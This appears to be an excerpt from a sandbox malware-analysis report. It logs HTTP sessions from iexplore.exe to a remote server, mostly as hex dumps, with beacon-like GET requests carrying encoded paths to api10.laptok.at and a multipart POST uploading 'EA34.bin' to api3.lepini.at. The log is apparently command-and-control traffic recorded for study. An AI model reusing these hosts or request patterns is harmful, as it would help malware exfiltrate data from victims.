20005$CLGs'6F1LcMg:!m[J`K'BPsa~&`\|Y~ErH: p8q.IUhQ7^ANuE$N-'UD?G>[#buv`0L_k6e-a4RWU\|$Y"_&}#Cft7NgD"N:7Id'/l8ccL{E!~XJjNPTr6b1C'${>KO3R5}s_g.':@Q:{j\|'vFwnP=='wyAAwI]KE^]{-Cyo'jO)%I={=IedpXnc:[x6.G1Y9\|VjY+C_w^7^(Jo'k4sDY2g4@W<:(_'j}?Sk2?q&fqd!Ma:zHW&Gl`P`pLcJ_@yMbfHO@m+bL/r2Z{pX`L.1jUt2W~i=FjZk)y?0pT6Uzbkazc\TMw8e:_2E+J,X59~sRc#P4;CFo,6nZRk{W>^,H\|'z^*&cBqP )zqywJv2B:qHp7wHo(B`bZTU
Feb 12, 2021 01:48:01.265038967 CET	3011	IN	Data Raw: dc 70 bd 9f 12 6d 16 e5 6f 30 b8 a2 ca 50 fa 3b 68 1c 79 fa 26 ef 04 c9 b6 c9 8a 01 a3 2a 11 b6 ab 12 85 ca f8 b5 0b 1d 7e 6a 6d 0a b9 e3 7c bd 8b f8 b2 71 2d d0 0a 72 d2 d8 9e 2c 82 32 1b 44 95 a3 2b 9b f6 a6 f0 93 d7 bb 4e 6d fc 4e 1b 56 af 31 Data Ascii: pmo0P;hy&~jm\|q-r,2D+NmNV1mLe7OS<7+r-`Y<&}7aqB-{GQCbX]{H_^r\|,9pr5xf,AvGd{td38SH_R4v%v*(QO%\|
Feb 12, 2021 01:48:01.265100956 CET	3012	IN	Data Raw: 7c 2c 22 64 56 e7 c8 5c d2 db d4 b1 64 e8 c8 99 8c 5e 5b 43 a2 ec 48 ea 29 d3 00 01 e8 20 ef a7 35 da c7 a9 d9 0b d4 47 0f c7 5e 18 ac be b5 39 98 b9 ea 93 f1 42 66 fa 8e 1e e3 b3 08 b7 56 c3 29 cf 3a e3 f4 8d 2a ae ff 86 fd 8e 51 fe 54 44 69 66 Data Ascii: \|,"dV\d^[CH) 5G^9BfV):QTDifEwi'.?,}1[9<>t\|lN)%frN!gb6iE):Rhng!(Wt/o/}jJ$#6-w${bZ?q~ "R-T#V
Feb 12, 2021 01:48:01.265156984 CET	3013	IN	Data Raw: cf fa bf 1f 6f 34 3b 6b f5 f9 7c 25 c3 3d 8d 89 5d 33 95 82 45 53 4e fd f5 38 a7 12 2c f7 6c 23 18 eb 27 06 f1 9a c0 91 7d 1f 05 9d 0a 42 bf 63 ec 94 ce a5 f8 12 47 6c c7 24 77 4d b1 14 0b ec c6 2b 66 1a e1 cc 3e d1 2f 42 72 6b 68 fc 91 4e 4a f6 Data Ascii: o4;k\|%=]3ESN8,l#'}BcGl$wM+f>/BrkhNJy Hu{oY"dc{&VK.hmX~ZCL-UVoR[w!('\Gn'A17\WFW@!/M>Y24>H`Y
Feb 12, 2021 01:48:01.265217066 CET	3015	IN	Data Raw: 7a 6d 2c 24 3b 2b 7c 96 af cd 36 c2 5c 7c 08 ec aa 84 00 63 6f 9c fb ee c2 6c c2 af fc b9 98 b2 77 e7 10 dc af c2 02 76 9c 7c 11 88 2e a6 b4 95 00 89 08 a9 7b 66 33 8f 6a 64 68 94 71 96 c8 ed cc 31 99 e1 ac f6 48 33 97 bc 11 d4 67 ce bc a7 c0 f7 Data Ascii: zm,$;+\|6\\|colwv\|.{f3jdhq1H3gP;&}s"zvaR:m&5U c+@bO=Gx@y+3[?!3&-Ut=LZ7)>xyVUi>Y5a9@4~v?l>@{M$
Feb 12, 2021 01:48:01.265271902 CET	3016	IN	Data Raw: 5d 84 e7 38 2e 33 8b de 55 2f 5d 9b 87 1b c8 41 40 8d c3 2b 9f de 4f 62 ff d6 43 b8 7c 5c 68 20 d9 22 c5 3c ae da af b3 b6 4f d4 07 99 f5 e2 cc 36 8f 0d 85 f6 a0 9a 08 df e1 b0 70 29 14 c9 f9 a2 47 a7 d9 83 57 6a 9c 91 cc d4 41 cf 17 f8 db bc 2f Data Ascii: ]8.3U/]A@+ObC\|\h "<O6p)GWjA/uukBJYmx3B>o)WJ{k@j5ufEiRO}/5Jwq/*S^FN0?IvU\|6d9dWh?w.8doJ
Feb 12, 2021 01:48:01.304090977 CET	3018	IN	Data Raw: 3b 41 56 c3 79 6d e0 3c 6c 13 1c 9e ce 19 0b 10 a8 67 4e 67 fd d0 f5 aa dc 15 f2 33 d6 6a 78 dd 20 b4 58 ec 6b 3b 62 eb 5d ad 0b 47 5c 0a d5 17 c9 ec 77 77 dc 8e 2d f6 73 ba 22 d6 36 b8 4d ce 4d 99 2d c0 01 94 e8 95 2d f8 5f 46 a4 66 f3 1e c7 5c Data Ascii: ;AVym<lgNg3jx Xk;b]G\ww-s"6MM--_Ff\UA\j~5s?<*G=LjQI5uIBr~^Cx+_YR2gXG?]eRVx^O6(9U2#6lsorFOp}Qs9pr<-6e_rt
Feb 12, 2021 01:48:01.304143906 CET	3019	IN	Data Raw: d7 70 5d d5 39 0b dc 37 29 09 49 57 75 3c 20 9e 05 26 39 b6 86 18 55 24 78 84 71 0b bc 01 c5 7f bf e3 5e ff 72 0c ab 34 59 30 d3 6f d6 c9 37 39 34 ec c9 26 0d bb c9 66 52 2a c6 69 2e a1 8f 95 e3 15 a9 b1 18 8d 8c 07 60 01 57 65 06 8b 97 b3 e1 7f Data Ascii: p]97)IWu< &9U$xq^r4Y0o794&fRi.`We4`mX[^'h+o?NO?R+r(MOI!tj"3\|8A')j7C8MYVxip&
Feb 12, 2021 01:48:01.304182053 CET	3021	IN	Data Raw: e1 af 51 b8 68 53 4e ed d8 2b 65 14 a2 7d 63 0a 14 90 b5 f0 73 76 ee 1c e7 19 b4 35 30 81 30 05 cc a6 cd bf c0 5b 03 85 34 67 21 40 60 e1 e1 00 23 e4 14 26 47 aa 8f a5 f9 c8 23 f0 c3 57 a1 28 1c 5a 59 47 71 ee 4c aa fd b9 ad 30 1f 57 5f 60 88 7a Data Ascii: QhSN+e}csv500[4g!@`#&G#W(ZYGqL0W_`zQF1B_z4R_ xT{?1$[7$=a/D$tI*/Xy#AO\|yp]D4l5u?4y43'>FoY9\)_X?Bgz
Feb 12, 2021 01:48:01.304224968 CET	3022	IN	Data Raw: 2d 95 66 11 29 26 da bb c8 7a b0 f0 81 bf 5e ac 1a 89 06 c0 08 6b 23 30 e0 2c 71 6a 15 95 00 58 6b 84 b0 20 b5 0a 19 6c d0 be 93 99 97 6d 16 09 5a fa 44 61 c9 74 1f f7 89 fb fd a1 e1 b2 38 53 6a b6 50 ec a6 55 9e e5 d4 f7 12 20 a8 9c 84 6c ab 43 Data Ascii: -f)&z^k#0,qjXk lmZDat8SjPU lCMlP^A$??,`d%wY`X/?BimMF4^a:rL>o@OX#mkrAmz-$0. 89h6".zL3?
Feb 12, 2021 01:48:01.339406967 CET	3023	IN	Data Raw: 6d 1e e7 f6 aa ed 4f 65 b0 8a 21 39 3f fa 96 19 fd 27 4b d1 c2 29 90 d7 2f 31 0f d9 5a 6c 54 a9 f5 94 43 b9 a0 bb 83 76 7f 3c d7 ea 93 bb 1f 6d f2 26 32 5b 46 7b 6b 5a a7 28 50 a2 a1 ee ee 0b c5 3a 9c 31 69 19 b3 9f 1d df a5 3c 96 4c f6 04 55 3c Data Ascii: mOe!9?'K)/1ZlTCv<m&2[F{kZ(P:1i<LU<')$0sSYf=S>\|1I2{+9@\F9la~Yuj)<F>rYd6C~$5 3h4bmrOlT\|QG"Bb Diq8m4*Gg'

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49763	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:48:01.687486887 CET	3223	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 01:48:01.775217056 CET	3224	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Feb 2021 00:48:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49775	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:50:25.695081949 CET	4788	OUT	POST /api1/RsIwSZJqBmnFWp/k0RKPzoP39EJsUfCvn9U0/s3Ro_2BX8FpAEZP2/GvtblFLhHDH6mo1/RMGOM6WbAUa1lApdXF/b2pdedlZ3/qpYYVCJc7fQcWbiTr8nK/Bk0n00rUWe1XJGRjTED/64Yq9FP7Vr7ogR_2F_2FIW/jqN_2F5vMG5hO/PoGZ6oYg/Kgn8ahDO8LXR63uTZq3jxu5/Mam_2B5oi7/JnfxFwuh8esDSEnOr/gXT5v_2Ftg3p/I_2BYvDou35/gKUMOMQtzty6Ym/n9ewjrURQdUpwg3uRDoov/tTCz4uS2xR_2Fkhe/RJPJsppl4utDFMy/X HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=40861208634264099622208846432 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Content-Length: 561 Host: api3.lepini.at
Feb 12, 2021 01:50:25.695106983 CET	4788	OUT	Data Raw: 2d 2d 34 30 38 36 31 32 30 38 36 33 34 32 36 34 30 39 39 36 32 32 32 30 38 38 34 36 34 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 Data Ascii: --40861208634264099622208846432Content-Disposition: form-data; name="upload_file"; filename="EA34.bin"v^ez%L\RJ]>gt1NQU]f=^B9ehQ/t.pW\|oO 1C!bhs1q,\oT$Ek'KS
Feb 12, 2021 01:50:26.090323925 CET	4789	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 00:50:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49765	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:48:03.927463055 CET	3256	OUT	GET /api1/JQsoHKJSB/rNdVJ_2ByIK2QDFJR2qj/j2rw6DMd2f1e8eX8Ymg/9u0LouY1o0qnmocJ9nvfxr/XWjhEhDNEaQ_2/FYjjcA0h/eSTxi0np2M3GkDMJDUmRsAx/UvQhMAtYfw/bHvbHCpgIxEwn0SZp/LrrAt8U21M_2/BpEUbP2CORo/UW2pHsPHTDkzWu/mBoET9UfbltaF6qE6vcC1/04nY6eMBCYxT6Jao/ppmN_2FO5sKlIZe/z_2BFpIddjhGIg8u2_/2BrPbB1qq/eH44l_2FjBBiq9Kt9ByU/r3_2FcOIEGEvR4XQZpv/b5bozqpj7Ty6A4nci6CZa8/UAjk867qSAa/FjzX0u4 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 01:48:04.369791031 CET	3257	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 00:48:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9a b5 82 ab 50 14 45 3f 88 02 b7 12 77 77 3a 2c b8 4b 80 af 7f 99 d7 4e 91 84 7b cf d9 7b ad 4c 78 aa b8 96 b1 c2 7a 8d 94 53 ca ab 0c 78 c0 97 0c 8c 1c 1b 61 97 1b 0f 41 dd 42 42 bf c9 b9 2f 61 9c 79 c1 4e a5 50 f4 9f 91 34 5d e9 e2 ba f5 74 88 02 d3 d7 0a 2b 86 1a a5 94 ee 3e a9 70 d4 87 92 18 d4 2f c9 8b e6 c2 3a 4a 94 a8 96 4f b7 b9 c7 ba 75 5b b8 12 ac 6b 2a 8b 25 7d a0 97 94 a1 7b b4 7e 26 75 04 ca af 69 51 11 16 38 2b 93 d8 d6 67 67 68 47 23 fd 38 88 52 81 97 6b f7 72 5a d2 3c c9 ad ca c1 68 80 25 80 1d 94 77 a5 e1 43 42 d1 c2 a0 9e 86 8f 70 73 33 43 34 52 92 0a 36 51 e6 40 a8 27 c3 ac 2f bd 59 db cd a2 70 ab 4d 05 23 89 d4 b1 42 42 14 07 66 fe a9 93 0e d2 4f e2 b3 5f ef a9 08 94 e0 09 5e 97 0c 5b f1 a6 a8 eb 89 ee 40 06 dd e2 23 4f e2 65 51 7a 78 8c 75 de de 8e d5 1d 4b 25 1e 5d dc 74 bc 52 32 07 41 91 b2 43 cb f2 d5 3b 9a 61 9f af 94 6a fa dc 2f 5a 23 6d 00 19 2a 37 84 7e 99 35 d0 5f ea 8a ac f6 e9 e3 eb 53 ea cd d7 54 78 a2 0b 8b 71 16 b1 5c d7 79 c1 e3 13 07 a9 ae f3 2d e4 44 2e 01 62 14 36 c7 6e f7 10 b5 07 6e fb 32 e8 6d 63 3a df 4b 05 60 75 52 cd cf c2 1d 7c d0 8a 0d db c8 94 60 b1 20 76 08 9c 92 56 df 37 32 08 f7 d6 42 c9 79 ed cc ba 13 df 54 38 89 bc 43 62 04 b5 a3 39 60 8d bd 33 b5 47 eb 5a 12 0d 3e 7b 6a c1 2d 54 d8 f6 c6 34 88 e7 e1 29 6b 51 19 c6 15 f3 bd a2 47 a6 37 1c fd 7e d5 59 8f 5a 43 09 13 be 8d c3 c4 4a 0c 72 d3 55 51 28 8c 94 a1 b3 cf e6 ba e1 ce 0c 45 ec 53 73 87 4e b3 39 b2 2a 9c 1a 0d 4f dc 90 8a 34 d0 cb 13 6d 75 62 28 4c 02 6c 5c 34 5b 50 06 05 9b f3 49 09 d8 2f e4 eb d1 42 42 8a 09 27 ca 13 a3 76 b7 f0 6d ae 58 ea f3 62 fb 83 3d 11 ee c1 d3 f8 69 4d db dc 5a 86 d1 f8 4b 10 b1 0c fe cd e5 9c 32 ec 5a 8c 6d 77 7f f9 29 d3 00 82 7b 73 5e d8 8c 1a dd d6 d1 23 6a a8 10 e0 a2 af ce f4 4c 6c 14 3a ef 7e 01 38 78 c7 0a 5e 24 bb a1 ee ca 4d af bc 2e 04 4d 76 98 ea d2 d6 69 c1 31 15 2e 0f be 55 c3 41 62 da 23 81 58 c0 6c 36 ca 71 e3 08 c9 1d d3 02 8d 35 1d 25 30 38 ff c4 5d 10 ec ba 73 2f b9 f0 9b bf 94 5c dc c7 0b 8b 5a 76 10 07 53 e9 e7 bb 0b a4 ed 8a 1d 86 6f 81 da 55 ca b2 87 90 16 66 53 19 a7 0a b7 66 95 78 92 d7 4b bb 38 e8 4d 09 7c 6c 86 c4 0a ba 01 45 a9 f1 92 5c 87 bd c1 82 21 9e 68 df 18 78 91 15 75 c1 2d ca b6 f3 59 06 25 8e 7b 56 11 87 58 a9 60 99 7c 13 30 66 eb 0c 0f c1 a4 d4 c3 88 a7 93 7c db 1e 8a a3 b0 d3 72 68 76 7e 46 4b f5 08 47 17 4a 23 20 36 6f 8a a4 66 11 71 79 3a e8 c7 91 c7 29 bb 82 6f 51 50 ab b2 89 8f f2 25 09 65 58 a5 c8 2c 01 9a f3 61 f3 93 af 44 32 3a 30 9c c8 04 fd be c1 27 98 e3 92 19 44 f8 54 01 44 ae 4d 92 54 af f4 46 81 e2 1b 2d 5c b4 8c fc db 75 fe ea ac 33 58 b8 a4 3e b9 f6 14 94 09 bf 83 bb 36 d3 d5 fe 06 b0 59 af df 5c 50 b9 f1 8b e0 13 4e 61 1e 10 7c 9e 0d b3 5b ce 36 13 fa a0 97 09 95 94 18 d9 e2 83 f8 8c 8d 84 75 df 11 a4 98 a1 b1 1e 75 12 25 92 ff 48 06 1a a2 eb 40 f9 03 e7 66 6d ad dc 27 2c 99 4c 71 96 14 06 9c 24 c5 d7 17 cf 7b 84 7f f5 5c e1 b6 23 67 25 e0 7e 6a e0 88 7e 13 1d 39 f0 53 30 af fd d3 2c 79 c7 97 67 6d ae 12 90 5c 64 ce fc e6 04 c2 cf 7c f8 f2 f0 c5 b2 3d e7 ec b7 5e 1b 0d 80 6f 0c e4 72 93 9d 21 84 3d 8c 5c 09 ae 45 fb Data Ascii: 2000PE?ww:,KN{{LxzSxaABB/ayNP4]t+>p/:JOu[k%}{~&uiQ8+gghG#8RkrZ<h%wCBps3C4R6Q@'/YpM#BBfO_^[@#OeQzxuK%]tR2AC;aj/Z#m7~5_STxq\y-D.b6nn2mc:K`uR\|` vV72ByT8Cb9`3GZ>{j-T4)kQG7~YZCJrUQ(ESsN9*O4mub(Ll\4[PI/BB'vmXb=iMZK2Zmw){s^#jLl:~8x^$M.Mvi1.UAb#Xl6q5%08]s/\ZvSoUfSfxK8M\|lE\!hxu-Y%{VX`\|0f\|rhv~FKGJ# 6ofqy:)oQP%eX,aD2:0'DTDMTF-\u3X>6Y\PNa\|[6uu%H@fm',Lq${\#g%~j~9S0,ygm\d\|=^or!=\E
Feb 12, 2021 01:48:04.369837999 CET	3259	IN	Data Raw: 80 0f 92 5f 01 af 2f e8 63 bd d6 31 55 49 80 b2 20 82 a8 9e 26 4f cf ce 9f 11 7e 7d b8 67 ec 86 1b 30 f4 4e bc cf 7b 7b 54 b1 52 a3 e0 43 61 22 11 3c fe 6f 4d 93 16 8a 43 de fe 4a d0 1a 1f d9 25 cc e2 5b ef bc 4c 14 ca 53 dc 44 81 8f dd d7 aa 61 Data Ascii: _/c1UI &O~}g0N{{TRCa"<oMCJ%[LSDaxB+I[]<Fz7" t?]mFY_aC_x>kc![1s9<hc3[^14A]B>lA&?1re',KdtO$f7>
Feb 12, 2021 01:48:04.369863987 CET	3260	IN	Data Raw: 0c 82 72 e0 19 5f e3 44 85 5c 90 06 91 e9 0a eb e0 b7 b1 68 e3 97 7e bf fb ac 73 5d d5 13 92 64 a8 6f d4 cb 40 53 9c b2 e5 9d 56 ac b4 27 93 35 8c 5d 7e d8 45 4f b3 1e 70 2f 00 f5 ac e9 43 75 51 18 0c 9f d0 00 7d be c3 68 63 24 c3 ba 4d d3 02 6e Data Ascii: r_D\h~s]do@SV'5]~EOp/CuQ}hc$Mn2/'3$WGN}l=jO3"z87N]lR NU(f~!9YK2\SSNPqbC\|D$8tK])4^X&I)!h.
Feb 12, 2021 01:48:04.369890928 CET	3261	IN	Data Raw: 8b 10 33 eb af 6d 9c ea 09 59 6c 94 ae 9b 58 f9 11 1f fc 34 c0 a7 67 8e df f0 9f 1e 03 1f 3f 55 bb e0 a3 83 a1 7b d8 33 e6 ee 0b e0 71 5e 54 db 3c ab 1b f0 6f df d2 58 e0 44 3e 11 90 4d c6 5c a5 3d cb 9a ff 2a 4e f9 a1 6d 5e a3 35 3a 26 d0 2f c8 Data Ascii: 3mYlX4g?U{3q^T<oXD>M\=*Nm^5:&/TjyEhyAK9&ecd>?f5YPU9S149J Hywi/a](k2!d2'3gkz$nB2[1BThJ
Feb 12, 2021 01:48:04.369918108 CET	3263	IN	Data Raw: 4e 77 2b 5f e6 6a 66 ce 4a 45 7e 08 13 a8 08 08 c3 dd 91 31 7e bd 0e 89 88 f8 c2 fb 87 bb 37 a2 d8 17 e0 11 92 c8 42 4e c8 6c e7 a3 90 e0 ae 2c c9 0f 20 a4 c9 f8 46 58 56 ac 88 78 57 4f 8d 38 53 49 8e 0f fd 66 28 39 c0 9d da 77 46 96 c7 e2 d7 64 Data Ascii: Nw+_jfJE~1~7BNl, FXVxWO8SIf(9wFdosL#\vTZrVJK3pppF y"KOtIVS>mlVkv1$iM&2luO=h0~(,uPe/nKH9[n8>xU]AwSz4
Feb 12, 2021 01:48:04.369942904 CET	3264	IN	Data Raw: da 2f 9b 04 32 34 71 62 ba 08 ac 3f 41 47 db bb ef 4d ea 5e 80 65 af 00 60 1b ce d0 c1 e7 d3 31 93 af 2e e4 fd 45 98 af 0c c1 58 d6 61 0d ca 74 1b 53 ac ed 70 a6 b9 8c 81 a6 4a e1 4c 88 a9 90 1d a5 85 6b 7d 7e 14 e9 2a eb f3 7c c1 ae f5 cc f4 23 Data Ascii: /24qb?AGM^e`1.EXatSpJLk}~*\|#6@:2SH\t@k7\|W`f;OPF@_fPDN~,mt!sm+W(A6c#:rnM~mE,VTlBrKN6#Xz]"{:?Bye
Feb 12, 2021 01:48:04.409495115 CET	3266	IN	Data Raw: 8f 97 67 8a cf 65 17 1d f4 31 40 14 5d ec 6b 88 52 37 64 27 96 4a 07 93 22 97 f5 33 b7 74 da 58 f4 6a 9b 4b 7c c8 93 c8 cb d9 c1 87 87 8a 35 10 9c 37 ed 29 34 a1 57 71 83 a9 e3 67 c9 58 59 43 e0 15 d2 14 c3 7e 4b df bc e3 35 9b 8a df 9a 78 33 64 Data Ascii: ge1@]kR7d'J"3tXjK\|57)4WqgXYC~K5x3dUcwu_f2n1y?6XmV_Civ<U{}sy?D^\w_0;j'r!Ng_s3M^(h)h#g6[B9>ka6_@(T(r}cLKT
Feb 12, 2021 01:48:04.409560919 CET	3267	IN	Data Raw: c9 bf 92 fe e6 a1 9a 46 6c 86 85 74 60 ee 1c af eb 5e 15 da ab 3a 27 20 80 ad 23 63 0d 9c 2b 4e 7d 53 37 67 8c 3e 27 e8 25 44 cd 85 71 1d da 74 1e 16 60 f3 cc db 39 cc 85 76 19 ab d4 fa dd a4 da 6f a4 f8 55 42 7b 6e ce cc c8 69 29 f9 a0 92 5c 79 Data Ascii: Flt`^:' #c+N}S7g>'%Dqt`9voUB{ni)\yR! \| [@D^8_LE8{Ls7TB\.?si\$%-q'Y\:u9@Xu&/'4i0A"gZ} Y#QT*
Feb 12, 2021 01:48:04.409615040 CET	3268	IN	Data Raw: 25 25 79 1e b7 0d d5 00 d4 af f9 a4 68 9b 04 2b 5a bc df e9 8d a5 78 41 73 25 4e a4 2b 40 c6 52 b6 00 84 1a ec 3d da b1 e7 15 a4 4f 10 9d ae f4 45 9a 71 04 88 43 7b d9 04 30 92 62 33 23 76 de 45 bf 62 d4 e7 82 d9 c6 8a 73 19 34 57 e2 23 bb 0e 6e Data Ascii: %%yh+ZxAs%N+@R=OEqC{0b3#vEbs4W#ntUstpc\<h_GbU{<jSRQ 8LFGHZ2ymD"hqbI5(.!J/EyC3&?:Ct(.A\|e3>Q\|u\Q`\v
Feb 12, 2021 01:48:04.409655094 CET	3270	IN	Data Raw: 64 49 47 d2 cd ba c2 81 f7 ea 03 28 89 7d ae ca c4 94 4f ea 18 1b 3a 66 c8 4f 21 ce 98 66 43 a8 d1 b0 cf 20 bd 36 34 03 4a 43 ee 34 53 7a 0d c1 d1 60 f3 0d ad e7 d0 57 32 be 0d 3b 39 0b a7 f6 a0 9f 33 90 14 82 4e d6 d3 87 19 97 da 04 91 2e f5 27 Data Ascii: dIG(}O:fO!fC 64JC4Sz`W2;93N.'T,cW`]{L/AN_M;F\cEN;%$?5zDAFk_NN0PQ=f9!Hu#QeI>fvB.WG.
Feb 12, 2021 01:48:04.444514036 CET	3271	IN	Data Raw: 5a c3 32 23 ce f5 08 3f 77 29 82 eb c9 64 31 b0 f0 90 26 8f 58 c3 7d 6a 36 2b ab 68 9a 00 89 1c a2 12 cf f7 5a 72 09 22 46 cc 08 2d 14 09 24 ec f1 18 46 ff 30 9a cc 08 c6 63 76 24 f6 e8 21 5b 48 42 ac 29 ac d1 2a 3e 0a 8b 6c df b0 39 9f a7 1d 85 Data Ascii: Z2#?w)d1&X}j6+hZr"F-$F0cv$![HB)>l9go($JP4?=1`cly`vU%k3_M\|{ `~4VO={z(=_1i~eY\|]Y >guG:#&KJ{1D

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49764	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:48:05.085619926 CET	3527	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 01:48:05.175679922 CET	3528	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Feb 2021 00:48:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49766	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:48:07.052175999 CET	3529	OUT	GET /api1/wPzY3TDew43rXgQ6h/jEuIuoewqqB_/2F8ty3dLaY0/g90J7yjpK4odzi/vJi7IcKUU7_2FxV8Z1qJI/_2Fs8Hy6ruNNXyd6/38pqG0u5LLQdPzP/ktNaKKuwlZigK_2Bvf/4YgNdy1LG/0Pu5bq_2FGp6HB5pNjiJ/RyL8GbL1FBB7I0W7eeW/LbvyRsvJlR2hT9EfEV7uAT/oI3vL_2BYGZE4/pytYFaia/wB_2BesnXvclSGag5xIl6QE/_2Fx_2FVgm/IkzdNmlB1x77eK_2F/ru0HED6qmv28/EwOp3VJsFvN/Oy6MX9770H20zV/NCGPJIvS0pQunXbVHlbjM/xQp8l5w_2BDk0RE85W/6 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 01:48:07.458751917 CET	3530	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 00:48:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 35 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 96 c5 81 84 00 00 c4 0a e2 c1 e2 f0 c4 dd 9d 1f ee ee 54 7f d7 43 26 13 99 f0 fa 8e e0 05 f9 06 ae 0f 68 b1 0c 60 df 25 66 de 52 7a 49 54 a7 42 46 cb 3c b8 bb a0 73 1c dc ec 1d 27 cf af 0f 9c 5f bb 88 f2 1d f3 5c b4 ef 7c 46 a5 a9 87 37 9a d8 2d 51 5c fb 77 3a c8 35 e9 8d a1 65 21 50 31 7b 23 8a 89 53 2f 0f 84 ae 6a 8f d8 a5 9d 60 9c 6b f8 87 11 db 3d 18 f2 91 df 0c d4 cb c9 e5 4f bc 7c 6c c1 18 57 54 15 f8 d2 4f ce 23 6f 68 6c a2 8b 3f 23 9e ef 67 27 7b 34 f0 0d 8c fd 43 72 87 22 db dc 28 83 3c 5a 98 86 32 35 0f e8 bc 17 44 41 17 9d 72 67 b8 1f 39 4e a7 c1 ff 04 d4 da 5e c3 bb af 45 c8 ec a1 17 97 c4 56 eb 86 47 eb a2 61 91 34 8b 97 cb 4f 20 90 e2 7d a1 85 38 bd 9b 7c 11 14 ba ea a5 84 77 d7 70 d3 c5 c0 e5 50 02 b4 a7 57 4e 85 76 ba 47 f4 f4 79 65 05 b9 07 a9 8b 8e 4b 51 77 71 1f 0c 16 ba aa 4b b4 50 eb 25 53 46 52 ef b0 b5 96 cd 2b 69 c7 6b 75 19 b6 99 cf 00 8f 17 98 a7 93 8e 35 4a 30 fd 13 7e 91 e4 37 64 bb d4 a6 a3 e8 2d 91 01 fe 32 20 8d 05 66 49 c8 60 16 56 f2 60 9e a4 76 1f 83 73 b8 f2 3a 7e c3 